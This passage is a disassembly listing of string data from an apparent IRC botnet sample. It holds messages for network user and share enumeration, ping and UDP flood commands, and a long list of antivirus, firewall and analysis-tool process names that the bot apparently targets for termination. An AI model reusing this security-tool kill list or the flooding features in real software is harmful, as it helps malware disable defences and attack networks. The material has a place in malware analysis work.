aTheOperationIs db 'The operation is allowed only on the primary domain controller of'
; DATA XREF: sub_4080BD+CB�o
db ' the domain.',0
align 10h
aAGeneralFailur db 'A general failure occurred in the network hardware.',0
; DATA XREF: sub_4080BD:loc_408164�o
aLevelParameter db 'Level parameter is invalid.',0 ; DATA XREF: sub_4080BD:loc_40815D�o
aDeviceOrDirect db 'Device or directory does not exist.',0
; DATA XREF: sub_4080BD:loc_408156�o
aInvalidForRedi db 'Invalid for redirected resource.',0 ; DATA XREF: sub_4080BD:loc_40814C�o
align 4
aDuplicateShare db 'Duplicate share name.',0 ; DATA XREF: sub_4080BD+85�o
align 10h
aTheNameIsInval db 'The name is invalid.',0 ; DATA XREF: sub_4080BD:loc_408126�o
align 4
aAccessDenied_ db 'Access denied.',0 ; DATA XREF: sub_4080BD:loc_40811C�o
align 4
aNotEnoughMemor db 'Not enough memory.',0 ; DATA XREF: sub_4080BD:loc_408112�o
align 4
aThisNetworkReq db 'This network request is not supported.',0
; DATA XREF: sub_4080BD:loc_408108�o
align 4
aServerNameNotF db 'Server name not found.',0 ; DATA XREF: sub_4080BD:loc_4080FE�o
align 4
aInvalidParamet db 'Invalid parameter.',0 ; DATA XREF: sub_4080BD+37�o
align 10h
aNetSServerSMes db '[NET]: %s <Server: %S> <Message: %S>',0 ; DATA XREF: sub_4081ED+A4�o
align 4
aNetMessageSent db '[NET]: Message sent successfully.',0 ; DATA XREF: sub_4081ED+7C�o
align 4
aNetSNoServiceS db '[NET]: %s: No service specified.',0 ; DATA XREF: sub_4082A9+65�o
align 10h
aNetErrorWithSe db '[NET]: Error with service: ',27h,'%s',27h,'. %s',0
; DATA XREF: sub_4082A9+4F�o
aNetSServiceS_ db '[NET]: %s service: ',27h,'%s',27h,'.',0 ; DATA XREF: sub_4082A9+33�o
align 10h
aNetSNoShareSpe db '[NET]: %s: No share specified.',0 ; DATA XREF: sub_408321+AA�o
align 10h
aNetSShareS_ db '[NET]: %s share: ',27h,'%s',27h,'.',0 ; DATA XREF: sub_408321+88�o
align 4
aNetSErrorWithS db '[NET]: %s: Error with share: ',27h,'%s',27h,'. %s',0
; DATA XREF: sub_408321+56�o
align 10h
a14s24s6u4s db '%-14S %-24S %-6u %-4s',0 ; DATA XREF: sub_4083DF+CE�o
align 4
aNo db 'No',0 ; DATA XREF: sub_4083DF+BA�o
align 4
aYes db 'Yes',0 ; DATA XREF: sub_4083DF+B3�o
aNetShareListEr db '[NET]: Share list error: %s <%ld>',0 ; DATA XREF: sub_4083DF+74�o
align 4
aShareNameResou db 'Share name: Resource: Uses: Desc:',0
; DATA XREF: sub_4083DF+1D�o
align 4
aNetSNoUsername db '[NET]: %s: No username specified.',0 ; DATA XREF: sub_4084FE+B5�o
align 10h
aNetSErrorWithU db '[NET]: %s: Error with username: ',27h,'%s',27h,'. %s',0
; DATA XREF: sub_4084FE+93�o
align 4
aNetSUsernameS_ db '[NET]: %s username: ',27h,'%s',27h,'.',0 ; DATA XREF: sub_4084FE+6D�o
align 4
aTotalUsersFoun db 'Total users found: %d.',0 ; DATA XREF: sub_4085C8+144�o
align 10h
aNetAnAccessVio db '[NET]: An access violation has occured.',0
; DATA XREF: sub_4085C8:loc_4086B3�o
aS_4 db ' %S',0 ; DATA XREF: sub_4085C8+B8�o
align 10h
aNetUserListErr db '[NET]: User list error: %s <%ld>',0 ; DATA XREF: sub_4085C8+78�o
align 4
aUsernameAccoun db 'Username accounts for local system:',0 ; DATA XREF: sub_4085C8+1F�o
aFlushdnsNotSup db '[FLUSHDNS]: Not supported by this system.',0
; DATA XREF: sub_408774:loc_40884B�o
align 4
aFlushdnsUnable db '[FLUSHDNS]: Unable to allocation ARP cache.',0
; DATA XREF: sub_408774:loc_40881C�o
aFlushdnsArpCac db '[FLUSHDNS]: ARP cache is empty.',0 ; DATA XREF: sub_408774:loc_4087C8�o
aFlushdnsErrorG db '[FLUSHDNS]: Error getting ARP cache: <%d>.',0
; DATA XREF: sub_408774+44�o
align 4
aPingFinishedSe db '[PING]: Finished sending pings to %s.',0 ; DATA XREF: sub_4088F8+138�o
align 4
aPingErrorSendi db '[PING]: Error sending pings to %s.',0 ; DATA XREF: sub_4088F8+6C�o
align 4
aUdpFinishedSen db '[UDP]: Finished sending packets to %s.',0 ; DATA XREF: sub_408A81+1CA�o
align 10h
aUdpErrorSendin db '[UDP]: Error sending pings to %s.',0 ; DATA XREF: sub_408A81+8C�o
align 4
aHass_exe db 'hass.exe',0 ; DATA XREF: .text:0042F744�o
align 10h
aWinmp_exe db 'winmp.exe',0 ; DATA XREF: .text:0042F740�o
align 4
aBling_exe db 'bling.exe',0 ; DATA XREF: .text:0042F73C�o
align 4
aWuamgrd_exe db 'wuamgrd.exe',0 ; DATA XREF: .text:0042F738�o
aScguard_exe db 'scguard.exe',0 ; DATA XREF: .text:0042F734�o
aWinssv_exe db 'winssv.exe',0 ; DATA XREF: .text:0042F730�o
align 4
aWruaclt_exe db 'WRUACLT.EXE',0 ; DATA XREF: .text:0042F72C�o
aWuacrlt_exe db 'WUACRLT.EXE',0 ; DATA XREF: .text:0042F728�o
aWuanclt_exe db 'WUANCLT.EXE',0 ; DATA XREF: .text:0042F724�o
aMsconfig_exe db 'MsConfiG.exe',0 ; DATA XREF: .text:0042F720�o
align 10h
aI11r54n4_exe db 'i11r54n4.exe',0 ; DATA XREF: .text:0042F71C�o
align 10h
aIrun4_exe db 'irun4.exe',0 ; DATA XREF: .text:0042F718�o
align 4
aD3dupdate_exe db 'd3dupdate.exe',0 ; DATA XREF: .text:0042F714�o
align 4
aRate_exe db 'rate.exe',0 ; DATA XREF: .text:0042F710�o
align 4
aSsate_exe db 'ssate.exe',0 ; DATA XREF: .text:0042F70C�o
align 4
aWinsys_exe db 'winsys.exe',0 ; DATA XREF: .text:0042F708�o
align 10h
aWinupd_exe db 'winupd.exe',0 ; DATA XREF: .text:0042F704�o
align 4
aSysmonxp_exe db 'SysMonXP.exe',0 ; DATA XREF: .text:0042F700�o
align 4
aBbeagle_exe db 'bbeagle.exe',0 ; DATA XREF: .text:0042F6FC�o
aPenis32_exe db 'Penis32.exe',0 ; DATA XREF: .text:0042F6F8�o
aMscvb32_exe db 'mscvb32.exe',0 ; DATA XREF: .text:0042F6F4�o
aSysinfo_exe db 'sysinfo.exe',0 ; DATA XREF: .text:0042F6F0�o
aPandaavengine_ db 'PandaAVEngine.exe',0 ; DATA XREF: .text:0042F6EC�o
align 10h
aFAgobot_exe db 'F-AGOBOT.EXE',0 ; DATA XREF: .text:0042F6E8�o
align 10h
aHijackthis_exe db 'HIJACKTHIS.EXE',0 ; DATA XREF: .text:0042F6E4�o
align 10h
a_avpm_exe db '_AVPM.EXE',0 ; DATA XREF: .text:0042F6E0�o
align 4
a_avpcc_exe db '_AVPCC.EXE',0 ; DATA XREF: .text:0042F6DC�o
align 4
a_avp32_exe db '_AVP32.EXE',0 ; DATA XREF: .text:0042F6D8�o
align 4
aZonealarm_exe db 'ZONEALARM.EXE',0 ; DATA XREF: .text:0042F6D4�o
align 4
aZonalm2601_exe db 'ZONALM2601.EXE',0 ; DATA XREF: .text:0042F6D0�o
align 4
aZatutor_exe db 'ZATUTOR.EXE',0 ; DATA XREF: .text:0042F6CC�o
aZapsetup3001_e db 'ZAPSETUP3001.EXE',0 ; DATA XREF: .text:0042F6C8�o
align 4
aZapro_exe db 'ZAPRO.EXE',0 ; DATA XREF: .text:0042F6C4�o
align 10h
aXpf202en_exe db 'XPF202EN.EXE',0 ; DATA XREF: .text:0042F6C0�o
align 10h
aWyvernworksfir db 'WYVERNWORKSFIREWALL.EXE',0 ; DATA XREF: .text:0042F6BC�o
aWupdt_exe db 'WUPDT.EXE',0 ; DATA XREF: .text:0042F6B8�o
align 4
aWupdater_exe db 'WUPDATER.EXE',0 ; DATA XREF: .text:0042F6B4�o
align 4
aWsbgate_exe db 'WSBGATE.EXE',0 ; DATA XREF: .text:0042F6B0�o
aWrctrl_exe db 'WRCTRL.EXE',0 ; DATA XREF: .text:0042F6AC�o
align 4
aWradmin_exe db 'WRADMIN.EXE',0 ; DATA XREF: .text:0042F6A8�o
aWnt_exe db 'WNT.EXE',0 ; DATA XREF: .text:0042F6A4�o
aWnad_exe db 'WNAD.EXE',0 ; DATA XREF: .text:0042F6A0�o
align 4
aWkufind_exe db 'WKUFIND.EXE',0 ; DATA XREF: .text:0042F69C�o
aWinupdate_exe db 'WINUPDATE.EXE',0 ; DATA XREF: .text:0042F698�o
align 4
aWintsk32_exe db 'WINTSK32.EXE',0 ; DATA XREF: .text:0042F694�o
align 4
aWinstart001_ex db 'WINSTART001.EXE',0 ; DATA XREF: .text:0042F690�o
aWinstart_exe db 'WINSTART.EXE',0 ; DATA XREF: .text:0042F68C�o
align 4
aWinssk32_exe db 'WINSSK32.EXE',0 ; DATA XREF: .text:0042F688�o
align 4
aWinservn_exe db 'WINSERVN.EXE',0 ; DATA XREF: .text:0042F684�o
align 4
aWinrecon_exe db 'WINRECON.EXE',0 ; DATA XREF: .text:0042F680�o
align 4
aWinppr32_exe db 'WINPPR32.EXE',0 ; DATA XREF: .text:0042F67C�o
align 4
aWinnet_exe db 'WINNET.EXE',0 ; DATA XREF: .text:0042F678�o
align 4
aWinmain_exe db 'WINMAIN.EXE',0 ; DATA XREF: .text:0042F674�o
aWinlogin_exe db 'WINLOGIN.EXE',0 ; DATA XREF: .text:0042F670�o
align 10h
aWininitx_exe db 'WININITX.EXE',0 ; DATA XREF: .text:0042F66C�o
align 10h
aWininit_exe db 'WININIT.EXE',0 ; DATA XREF: .text:0042F668�o
aWininetd_exe db 'WININETD.EXE',0 ; DATA XREF: .text:0042F664�o
align 4
aWindows_exe db 'WINDOWS.EXE',0 ; DATA XREF: .text:0042F660�o
aWindow_exe db 'WINDOW.EXE',0 ; DATA XREF: .text:0042F65C�o
align 4
aWinactive_exe db 'WINACTIVE.EXE',0 ; DATA XREF: .text:0042F658�o
align 4
aWin32us_exe db 'WIN32US.EXE',0 ; DATA XREF: .text:0042F654�o
aWin32_exe db 'WIN32.EXE',0 ; DATA XREF: .text:0042F650�o
align 4
aWinBugsfix_exe db 'WIN-BUGSFIX.EXE',0 ; DATA XREF: .text:0042F64C�o
aWimmun32_exe db 'WIMMUN32.EXE',0 ; DATA XREF: .text:0042F648�o
align 4
aWhoswatchingme db 'WHOSWATCHINGME.EXE',0 ; DATA XREF: .text:0042F644�o
align 10h
aWgfe95_exe db 'WGFE95.EXE',0 ; DATA XREF: .text:0042F640�o
align 4
aWfindv32_exe db 'WFINDV32.EXE',0 ; DATA XREF: .text:0042F63C�o
align 4
aWebtrap_exe db 'WEBTRAP.EXE',0 ; DATA XREF: .text:0042F638�o
aWebscanx_exe db 'WEBSCANX.EXE',0 ; DATA XREF: .text:0042F634�o
align 4
aWebdav_exe db 'WEBDAV.EXE',0 ; DATA XREF: .text:0042F630�o
align 4
aWatchdog_exe db 'WATCHDOG.EXE',0 ; DATA XREF: .text:0042F62C�o
align 4
aW9x_exe db 'W9X.EXE',0 ; DATA XREF: .text:0042F628�o
aW32dsm89_exe db 'W32DSM89.EXE',0 ; DATA XREF: .text:0042F624�o
align 4
aVswinperse_exe db 'VSWINPERSE.EXE',0 ; DATA XREF: .text:0042F620�o
align 4
aVswinntse_exe db 'VSWINNTSE.EXE',0 ; DATA XREF: .text:0042F61C�o
align 4
aVswin9xe_exe db 'VSWIN9XE.EXE',0 ; DATA XREF: .text:0042F618�o
align 4
aVsstat_exe db 'VSSTAT.EXE',0 ; DATA XREF: .text:0042F614�o
align 4
aVsmon_exe db 'VSMON.EXE',0 ; DATA XREF: .text:0042F610�o
align 4
aVsmain_exe db 'VSMAIN.EXE',0 ; DATA XREF: .text:0042F60C�o
align 10h
aVsisetup_exe db 'VSISETUP.EXE',0 ; DATA XREF: .text:0042F608�o
align 10h
aVshwin32_exe db 'VSHWIN32.EXE',0 ; DATA XREF: .text:0042F604�o
align 10h
aVsecomr_exe db 'VSECOMR.EXE',0 ; DATA XREF: .text:0042F600�o
aVsched_exe db 'VSCHED.EXE',0 ; DATA XREF: .text:0042F5FC�o
align 4
aVscenu6_02d30_ db 'VSCENU6.02D30.EXE',0 ; DATA XREF: .text:0042F5F8�o
align 4
aVscan40_exe db 'VSCAN40.EXE',0 ; DATA XREF: .text:0042F5F4�o
aVptray_exe db 'VPTRAY.EXE',0 ; DATA XREF: .text:0042F5F0�o
align 4
aVpfw30s_exe db 'VPFW30S.EXE',0 ; DATA XREF: .text:0042F5EC�o
aVpc42_exe db 'VPC42.EXE',0 ; DATA XREF: .text:0042F5E8�o
align 4
aVpc32_exe db 'VPC32.EXE',0 ; DATA XREF: .text:0042F5E4�o
align 4
aVnpc3000_exe db 'VNPC3000.EXE',0 ; DATA XREF: .text:0042F5E0�o
align 4
aVnlan300_exe db 'VNLAN300.EXE',0 ; DATA XREF: .text:0042F5DC�o
align 4
aVirusmdpersona db 'VIRUSMDPERSONALFIREWALL.EXE',0 ; DATA XREF: .text:0042F5D8�o
aVirHelp_exe db 'VIR-HELP.EXE',0 ; DATA XREF: .text:0042F5D4�o
align 4
aVfsetup_exe db 'VFSETUP.EXE',0 ; DATA XREF: .text:0042F5D0�o
aVettray_exe db 'VETTRAY.EXE',0 ; DATA XREF: .text:0042F5CC�o
aVet95_exe db 'VET95.EXE',0 ; DATA XREF: .text:0042F5C8�o
align 4
aVet32_exe db 'VET32.EXE',0 ; DATA XREF: .text:0042F5C4�o
align 4
aVcsetup_exe db 'VCSETUP.EXE',0 ; DATA XREF: .text:0042F5C0�o
aVbwinntw_exe db 'VBWINNTW.EXE',0 ; DATA XREF: .text:0042F5BC�o
align 10h
aVbwin9x_exe db 'VBWIN9X.EXE',0 ; DATA XREF: .text:0042F5B8�o
aVbust_exe db 'VBUST.EXE',0 ; DATA XREF: .text:0042F5B4�o
align 4
aVbcons_exe db 'VBCONS.EXE',0 ; DATA XREF: .text:0042F5B0�o
align 4
aVbcmserv_exe db 'VBCMSERV.EXE',0 ; DATA XREF: .text:0042F5AC�o
align 4
aUtpost_exe db 'UTPOST.EXE',0 ; DATA XREF: .text:0042F5A8�o
align 10h
aUpgrad_exe db 'UPGRAD.EXE',0 ; DATA XREF: .text:0042F5A4�o
align 4
aUpdate_exe db 'UPDATE.EXE',0 ; DATA XREF: .text:0042F59C�o
; .text:0042F5A0�o
align 4
aUpdat_exe db 'UPDAT.EXE',0 ; DATA XREF: .text:0042F598�o
align 4
aUndoboot_exe db 'UNDOBOOT.EXE',0 ; DATA XREF: .text:0042F594�o
align 4
aTvtmd_exe db 'TVTMD.EXE',0 ; DATA XREF: .text:0042F590�o
align 10h
aTvmd_exe db 'TVMD.EXE',0 ; DATA XREF: .text:0042F58C�o
align 4
aTsadbot_exe db 'TSADBOT.EXE',0 ; DATA XREF: .text:0042F588�o
aTrojantrap3_ex db 'TROJANTRAP3.EXE',0 ; DATA XREF: .text:0042F584�o
aTrjsetup_exe db 'TRJSETUP.EXE',0 ; DATA XREF: .text:0042F580�o
align 4
aTrjscan_exe db 'TRJSCAN.EXE',0 ; DATA XREF: .text:0042F57C�o
aTrickler_exe db 'TRICKLER.EXE',0 ; DATA XREF: .text:0042F578�o
align 4
aTracert_exe db 'TRACERT.EXE',0 ; DATA XREF: .text:0042F574�o
aTitaninxp_exe db 'TITANINXP.EXE',0 ; DATA XREF: .text:0042F570�o
align 10h
aTitanin_exe db 'TITANIN.EXE',0 ; DATA XREF: .text:0042F56C�o
aTgbob_exe db 'TGBOB.EXE',0 ; DATA XREF: .text:0042F568�o
align 4
aTfak5_exe db 'TFAK5.EXE',0 ; DATA XREF: .text:0042F564�o
align 4
aTfak_exe db 'TFAK.EXE',0 ; DATA XREF: .text:0042F560�o
align 10h
aTeekids_exe db 'TEEKIDS.EXE',0 ; DATA XREF: .text:0042F55C�o
aTds2Nt_exe db 'TDS2-NT.EXE',0 ; DATA XREF: .text:0042F558�o
aTds298_exe db 'TDS2-98.EXE',0 ; DATA XREF: .text:0042F554�o
aTds3_exe db 'TDS-3.EXE',0 ; DATA XREF: .text:0042F550�o
align 10h
aTcm_exe db 'TCM.EXE',0 ; DATA XREF: .text:0042F54C�o
aTca_exe db 'TCA.EXE',0 ; DATA XREF: .text:0042F548�o
aTc_exe db 'TC.EXE',0 ; DATA XREF: .text:0042F544�o
align 4
aTbscan_exe db 'TBSCAN.EXE',0 ; DATA XREF: .text:0042F540�o
align 4
aTaumon_exe db 'TAUMON.EXE',0 ; DATA XREF: .text:0042F53C�o
align 10h
aTaskmon_exe db 'TASKMON.EXE',0 ; DATA XREF: .text:0042F538�o
aTaskmo_exe db 'TASKMO.EXE',0 ; DATA XREF: .text:0042F534�o
align 4
aTaskmg_exe db 'TASKMG.EXE',0 ; DATA XREF: .text:0042F530�o
align 4
aSysupd_exe db 'SYSUPD.EXE',0 ; DATA XREF: .text:0042F52C�o
align 10h
aSystem32_exe db 'SYSTEM32.EXE',0 ; DATA XREF: .text:0042F528�o
align 10h
aSystem_exe db 'SYSTEM.EXE',0 ; DATA XREF: .text:0042F524�o
align 4
aSysedit_exe db 'SYSEDIT.EXE',0 ; DATA XREF: .text:0042F520�o
aSymtray_exe db 'SYMTRAY.EXE',0 ; DATA XREF: .text:0042F51C�o
aSymproxysvc_ex db 'SYMPROXYSVC.EXE',0 ; DATA XREF: .text:0042F518�o
aSweepnet_sweep db 'SWEEPNET.SWEEPSRV.SYS.SWNETSUP.EXE',0 ; DATA XREF: .text:0042F514�o
align 4
aSweep95_exe db 'SWEEP95.EXE',0 ; DATA XREF: .text:0042F510�o
aUpd32_exe db 'UPD32.EXE',0 ; DATA XREF: .text:0042F50C�o
align 10h
aSvshost32_exe db 'SVSHOST32.EXE',0 ; DATA XREF: .text:0042F508�o
align 10h
aSvshost_exe db 'SVSHOST.EXE',0 ; DATA XREF: .text:0042F504�o
aSvchosts_exe db 'SVCHOSTS.EXE',0 ; DATA XREF: .text:0042F500�o
align 4
aSvchostc_exe db 'SVCHOSTC.EXE',0 ; DATA XREF: .text:0042F4FC�o
align 4
aSvc_exe db 'SVC.EXE',0 ; DATA XREF: .text:0042F4F8�o
aSupporter5_exe db 'SUPPORTER5.EXE',0 ; DATA XREF: .text:0042F4F4�o
align 4
aSupport_exe db 'SUPPORT.EXE',0 ; DATA XREF: .text:0042F4F0�o
aSupftrl_exe db 'SUPFTRL.EXE',0 ; DATA XREF: .text:0042F4EC�o
aStcloader_exe db 'STCLOADER.EXE',0 ; DATA XREF: .text:0042F4E8�o
align 4
aStart_exe db 'START.EXE',0 ; DATA XREF: .text:0042F4E4�o
align 4
aSt2_exe db 'ST2.EXE',0 ; DATA XREF: .text:0042F4E0�o
aSsg_4104_exe db 'SSG_4104.EXE',0 ; DATA XREF: .text:0042F4DC�o
align 10h
aSsgrate_exe db 'SSGRATE.EXE',0 ; DATA XREF: .text:0042F4D8�o
aSs3edit_exe db 'SS3EDIT.EXE',0 ; DATA XREF: .text:0042F4D4�o
aSrng_exe db 'SRNG.EXE',0 ; DATA XREF: .text:0042F4D0�o
align 4
aSrexe_exe db 'SREXE.EXE',0 ; DATA XREF: .text:0042F4CC�o
align 10h
aSpyxx_exe db 'SPYXX.EXE',0 ; DATA XREF: .text:0042F4C8�o
align 4
aSpoolsv32_exe db 'SPOOLSV32.EXE',0 ; DATA XREF: .text:0042F4C4�o
align 4
aSpoolcv_exe db 'SPOOLCV.EXE',0 ; DATA XREF: .text:0042F4C0�o
aSpoler_exe db 'SPOLER.EXE',0 ; DATA XREF: .text:0042F4BC�o
align 4
aSphinx_exe db 'SPHINX.EXE',0 ; DATA XREF: .text:0042F4B8�o
align 10h
aSpf_exe db 'SPF.EXE',0 ; DATA XREF: .text:0042F4B4�o
aSperm_exe db 'SPERM.EXE',0 ; DATA XREF: .text:0042F4B0�o
align 4
aSofi_exe db 'SOFI.EXE',0 ; DATA XREF: .text:0042F4AC�o
align 10h
aSoap_exe db 'SOAP.EXE',0 ; DATA XREF: .text:0042F4A8�o
align 4
aSmss32_exe db 'SMSS32.EXE',0 ; DATA XREF: .text:0042F4A4�o
align 4
aSms_exe db 'SMS.EXE',0 ; DATA XREF: .text:0042F4A0�o
aSmc_exe db 'SMC.EXE',0 ; DATA XREF: .text:0042F49C�o
aShowbehind_exe db 'SHOWBEHIND.EXE',0 ; DATA XREF: .text:0042F498�o
align 4
aShn_exe db 'SHN.EXE',0 ; DATA XREF: .text:0042F494�o
aShellspyinstal db 'SHELLSPYINSTALL.EXE',0 ; DATA XREF: .text:0042F490�o
aSh_exe db 'SH.EXE',0 ; DATA XREF: .text:0042F48C�o
align 4
aSgssfw32_exe db 'SGSSFW32.EXE',0 ; DATA XREF: .text:0042F488�o
align 4
aSfc_exe db 'SFC.EXE',0 ; DATA XREF: .text:0042F484�o
aSetup_flowprot db 'SETUP_FLOWPROTECTOR_US.EXE',0 ; DATA XREF: .text:0042F480�o
align 10h
aSetupvameeval_ db 'SETUPVAMEEVAL.EXE',0 ; DATA XREF: .text:0042F47C�o
align 4
aServlces_exe db 'SERVLCES.EXE',0 ; DATA XREF: .text:0042F478�o
align 4
aServlce_exe db 'SERVLCE.EXE',0 ; DATA XREF: .text:0042F474�o
aService_exe db 'SERVICE.EXE',0 ; DATA XREF: .text:0042F470�o
aServ95_exe db 'SERV95.EXE',0 ; DATA XREF: .text:0042F46C�o
align 4
aSd_exe db 'SD.EXE',0 ; DATA XREF: .text:0042F468�o
align 10h
aScvhost_exe db 'SCVHOST.EXE',0 ; DATA XREF: .text:0042F464�o
aScrsvr_exe db 'SCRSVR.EXE',0 ; DATA XREF: .text:0042F460�o
align 4
aScrscan_exe db 'SCRSCAN.EXE',0 ; DATA XREF: .text:0042F45C�o
aScanpm_exe db 'SCANPM.EXE',0 ; DATA XREF: .text:0042F458�o
align 10h
aScan95_exe db 'SCAN95.EXE',0 ; DATA XREF: .text:0042F454�o
align 4
aScan32_exe db 'SCAN32.EXE',0 ; DATA XREF: .text:0042F450�o
align 4
aScam32_exe db 'SCAM32.EXE',0 ; DATA XREF: .text:0042F44C�o
align 4
aSc_exe db 'SC.EXE',0 ; DATA XREF: .text:0042F448�o
align 4
aSbserv_exe db 'SBSERV.EXE',0 ; DATA XREF: .text:0042F444�o
align 4
aSavenow_exe db 'SAVENOW.EXE',0 ; DATA XREF: .text:0042F440�o
aSave_exe db 'SAVE.EXE',0 ; DATA XREF: .text:0042F43C�o
align 10h
aSahagent_exe db 'SAHAGENT.EXE',0 ; DATA XREF: .text:0042F438�o
align 10h
aSafeweb_exe db 'SAFEWEB.EXE',0 ; DATA XREF: .text:0042F434�o
aRuxdll32_exe db 'RUXDLL32.EXE',0 ; DATA XREF: .text:0042F430�o
align 4
aRundll16_exe db 'RUNDLL16.EXE',0 ; DATA XREF: .text:0042F42C�o
align 4
aRundll_exe db 'RUNDLL.EXE',0 ; DATA XREF: .text:0042F428�o
align 4
aRun32dll_exe db 'RUN32DLL.EXE',0 ; DATA XREF: .text:0042F424�o
align 4
aRulaunch_exe db 'RULAUNCH.EXE',0 ; DATA XREF: .text:0042F420�o
align 4
aRtvscn95_exe db 'RTVSCN95.EXE',0 ; DATA XREF: .text:0042F41C�o
align 4
aRtvscan_exe db 'RTVSCAN.EXE',0 ; DATA XREF: .text:0042F418�o
aRshell_exe db 'RSHELL.EXE',0 ; DATA XREF: .text:0042F414�o
align 10h
aRrguard_exe db 'RRGUARD.EXE',0 ; DATA XREF: .text:0042F410�o
aRescue32_exe db 'RESCUE32.EXE',0 ; DATA XREF: .text:0042F40C�o
align 4
aRescue_exe db 'RESCUE.EXE',0 ; DATA XREF: .text:0042F408�o
align 4
aRegedt32_exe db 'REGEDT32.EXE',0 ; DATA XREF: .text:0042F404�o
align 4
aRegedit_exe db 'REGEDIT.EXE',0 ; DATA XREF: .text:0042F400�o
aReged_exe db 'REGED.EXE',0 ; DATA XREF: .text:0042F3FC�o
align 10h
aRealmon_exe db 'REALMON.EXE',0 ; DATA XREF: .text:0042F3F8�o
aRcsync_exe db 'RCSYNC.EXE',0 ; DATA XREF: .text:0042F3F4�o
align 4
aRb32_exe db 'RB32.EXE',0 ; DATA XREF: .text:0042F3F0�o
align 4
aRay_exe db 'RAY.EXE',0 ; DATA XREF: .text:0042F3EC�o
aRav8win32eng_e db 'RAV8WIN32ENG.EXE',0 ; DATA XREF: .text:0042F3E8�o
align 10h
aRav7win_exe db 'RAV7WIN.EXE',0 ; DATA XREF: .text:0042F3E4�o
aRav7_exe db 'RAV7.EXE',0 ; DATA XREF: .text:0042F3E0�o
align 4
aRapapp_exe db 'RAPAPP.EXE',0 ; DATA XREF: .text:0042F3DC�o
align 4
aQserver_exe db 'QSERVER.EXE',0 ; DATA XREF: .text:0042F3D8�o
aQconsole_exe db 'QCONSOLE.EXE',0 ; DATA XREF: .text:0042F3D4�o
align 10h
aPview95_exe db 'PVIEW95.EXE',0 ; DATA XREF: .text:0042F3D0�o
aPussy_exe db 'PUSSY.EXE',0 ; DATA XREF: .text:0042F3CC�o
align 4
aPurge_exe db 'PURGE.EXE',0 ; DATA XREF: .text:0042F3C8�o
align 4
aPspf_exe db 'PSPF.EXE',0 ; DATA XREF: .text:0042F3C4�o
align 10h
aProtectx_exe db 'PROTECTX.EXE',0 ; DATA XREF: .text:0042F3C0�o
align 10h
aProport_exe db 'PROPORT.EXE',0 ; DATA XREF: .text:0042F3BC�o
aProgramauditor db 'PROGRAMAUDITOR.EXE',0 ; DATA XREF: .text:0042F3B8�o
align 10h
aProcexplorerv1 db 'PROCEXPLORERV1.0.EXE',0 ; DATA XREF: .text:0042F3B4�o
align 4
aProcessmonitor db 'PROCESSMONITOR.EXE',0 ; DATA XREF: .text:0042F3B0�o
align 4
aProcdump_exe db 'PROCDUMP.EXE',0 ; DATA XREF: .text:0042F3AC�o
align 4
aPrmvr_exe db 'PRMVR.EXE',0 ; DATA XREF: .text:0042F3A8�o
align 4
aPrmt_exe db 'PRMT.EXE',0 ; DATA XREF: .text:0042F3A4�o
align 4
aPrizesurfer_ex db 'PRIZESURFER.EXE',0 ; DATA XREF: .text:0042F3A0�o
aPpvstop_exe db 'PPVSTOP.EXE',0 ; DATA XREF: .text:0042F39C�o
aPptbc_exe db 'PPTBC.EXE',0 ; DATA XREF: .text:0042F398�o
align 4
aPpinupdt_exe db 'PPINUPDT.EXE',0 ; DATA XREF: .text:0042F394�o
align 4
aPowerscan_exe db 'POWERSCAN.EXE',0 ; DATA XREF: .text:0042F390�o
align 4
aPortmonitor_ex db 'PORTMONITOR.EXE',0 ; DATA XREF: .text:0042F38C�o
aPortdetective_ db 'PORTDETECTIVE.EXE',0 ; DATA XREF: .text:0042F388�o
align 10h
aPopscan_exe db 'POPSCAN.EXE',0 ; DATA XREF: .text:0042F384�o
aPoproxy_exe db 'POPROXY.EXE',0 ; DATA XREF: .text:0042F380�o
aPop3trap_exe db 'POP3TRAP.EXE',0 ; DATA XREF: .text:0042F37C�o
align 4
aPlatin_exe db 'PLATIN.EXE',0 ; DATA XREF: .text:0042F378�o
align 4
aPingscan_exe db 'PINGSCAN.EXE',0 ; DATA XREF: .text:0042F374�o
align 4
aPgmonitr_exe db 'PGMONITR.EXE',0 ; DATA XREF: .text:0042F370�o
align 4
aPfwadmin_exe db 'PFWADMIN.EXE',0 ; DATA XREF: .text:0042F36C�o
align 4
aPf2_exe db 'PF2.EXE',0 ; DATA XREF: .text:0042F368�o
aPerswf_exe db 'PERSWF.EXE',0 ; DATA XREF: .text:0042F364�o
align 4
aPersfw_exe db 'PERSFW.EXE',0 ; DATA XREF: .text:0042F360�o
align 4
aPeriscope_exe db 'PERISCOPE.EXE',0 ; DATA XREF: .text:0042F35C�o
align 4
aPenis_exe db 'PENIS.EXE',0 ; DATA XREF: .text:0042F358�o
align 10h
aPdsetup_exe db 'PDSETUP.EXE',0 ; DATA XREF: .text:0042F354�o
aPcscan_exe db 'PCSCAN.EXE',0 ; DATA XREF: .text:0042F350�o
align 4
aPcip10117_0_ex db 'PCIP10117_0.EXE',0 ; DATA XREF: .text:0042F34C�o
aPcfwallicon_ex db 'PCFWALLICON.EXE',0 ; DATA XREF: .text:0042F348�o
aPcdsetup_exe db 'PCDSETUP.EXE',0 ; DATA XREF: .text:0042F344�o
align 4
aPccwin98_exe db 'PCCWIN98.EXE',0 ; DATA XREF: .text:0042F340�o
align 4
aPccwin97_exe db 'PCCWIN97.EXE',0 ; DATA XREF: .text:0042F33C�o
align 4
aPccntmon_exe db 'PCCNTMON.EXE',0 ; DATA XREF: .text:0042F338�o
align 4
aPcciomon_exe db 'PCCIOMON.EXE',0 ; DATA XREF: .text:0042F334�o
align 4
aPcc2k_76_1436_ db 'PCC2K_76_1436.EXE',0 ; DATA XREF: .text:0042F330�o
align 4
aPcc2002s902_ex db 'PCC2002S902.EXE',0 ; DATA XREF: .text:0042F32C�o
aPavw_exe db 'PAVW.EXE',0 ; DATA XREF: .text:0042F328�o
align 4
aPavsched_exe db 'PAVSCHED.EXE',0 ; DATA XREF: .text:0042F324�o
align 4
aPavproxy_exe db 'PAVPROXY.EXE',0 ; DATA XREF: .text:0042F320�o
align 4
aPavcl_exe db 'PAVCL.EXE',0 ; DATA XREF: .text:0042F31C�o
align 4
aPatch_exe db 'PATCH.EXE',0 ; DATA XREF: .text:0042F318�o
align 10h
aPanixk_exe db 'PANIXK.EXE',0 ; DATA XREF: .text:0042F314�o
align 4
aPadmin_exe db 'PADMIN.EXE',0 ; DATA XREF: .text:0042F310�o
align 4
aOutpostproinst db 'OUTPOSTPROINSTALL.EXE',0 ; DATA XREF: .text:0042F30C�o
align 10h
aOutpostinstall db 'OUTPOSTINSTALL.EXE',0 ; DATA XREF: .text:0042F308�o
